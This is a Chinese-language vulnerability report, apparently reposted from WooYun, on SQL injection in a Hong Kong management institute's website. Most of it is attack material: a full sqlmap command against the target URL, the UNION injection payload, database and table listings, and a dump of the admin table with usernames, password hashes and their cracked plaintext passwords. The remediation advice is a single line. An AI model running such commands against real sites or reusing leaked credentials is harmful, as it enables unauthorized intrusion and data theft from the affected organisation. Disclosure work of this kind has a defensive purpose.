神刀安全网

漏洞标题: 亞洲知識管理學院某处存在SQL注入(已入后台)(香港地區)

漏洞详情

披露状态:

2016-03-11: 细节已通知厂商并且等待厂商处理中
2016-03-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

如题

详细说明:

target:

code 区域
http://**.**.**.**/whoswho/leader_talk.php?id=16

union:

漏洞标题:  亞洲知識管理學院某处存在SQL注入(已入后台)(香港地區)

payload:

code 区域
$ python sqlmap.py -u "http://**.**.**.**/whoswho/leader_talk.php?id=16" --random-agent --dbms=mysql --technique=U --union-cols=1 --union-char=7  --hex

sqlmap:

code 区域
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: UNION query
Title: Generic UNION query (7) - 1 column (custom)
Payload: id=-1213 UNION ALL SELECT CONCAT(0x7162717171,0x6c6e7961637646536970,0x716a7a7671)--
---
[17:07:14] [INFO] testing MySQL
[17:07:14] [INFO] confirming MySQL
[17:07:14] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.24
back-end DBMS: MySQL >= 5.0.0

漏洞证明:

databases:

code 区域
available databases [2]:                                                       
[*] akmacomhk_form
[*] information_schema

tables:

code 区域
Database: akmacomhk_form
+-------------------+---------+
| Table | Entries |
+-------------------+---------+
| achievement | 232 |
| proqualifications | 225 |
| society | 215 |
| resume | 188 |
| oldposition | 184 |
| course | 149 |
| district | 59 |
| suggestedposition | 55 |
| quicksearch | 47 |
| talk | 16 |
| natures | 15 |
| title | 6 |
| shipping | 5 |
| region | 4 |
| admin | 2 |
+-------------------+---------+

columns:

code 区域
Database: akmacomhk_form
Table: admin
[2 entries]
+---------------+---------------------------------------------+
| name | password |
+---------------+---------------------------------------------+
| Administrator | 8c557ea1a6579c399626694976664451 (redapple) |
| Staff | fe01ce2a7fbac8fafaed7c982a04e229 (demo) |
+---------------+---------------------------------------------+

admin:

漏洞标题:  亞洲知識管理學院某处存在SQL注入(已入后台)(香港地區)

漏洞标题:  亞洲知識管理學院某处存在SQL注入(已入后台)(香港地區)

由以上sqlmap数据即可证明sql注入漏洞存在,可进入后台影响网站相关数据

修复方案:

过滤相关参数

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 亞洲知識管理學院某处存在SQL注入(已入后台)(香港地區)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮